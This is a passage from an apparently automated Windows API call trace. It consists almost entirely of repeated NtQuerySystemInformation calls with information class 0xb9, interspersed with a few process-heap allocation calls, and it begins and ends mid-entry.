(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] GetProcessHeap () returned 0x269489b0000 [0233.592] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949596170 [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.594] GetProcessHeap () returned 0x269489b0000 [0233.594] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x76) returned 0x26948a41cf0 [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] GetProcessHeap () returned 0x269489b0000 [0233.598] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x30) returned 0x269495cf660 [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.602] GetProcessHeap () returned 0x269489b0000 [0233.602] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x30) returned 0x26948a54690 [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.605] GetProcessHeap () returned 0x269489b0000 [0233.605] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x269495965d0 [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] GetProcessHeap () returned 0x269489b0000 [0233.609] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x4e) returned 0x26948a4dbd0 [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] GetProcessHeap () returned 0x269489b0000 [0233.612] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x3e) returned 0x26948a505d0 [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] GetProcessHeap () returned 0x269489b0000 [0233.616] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x3e) returned 0x26948a507b0 [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation 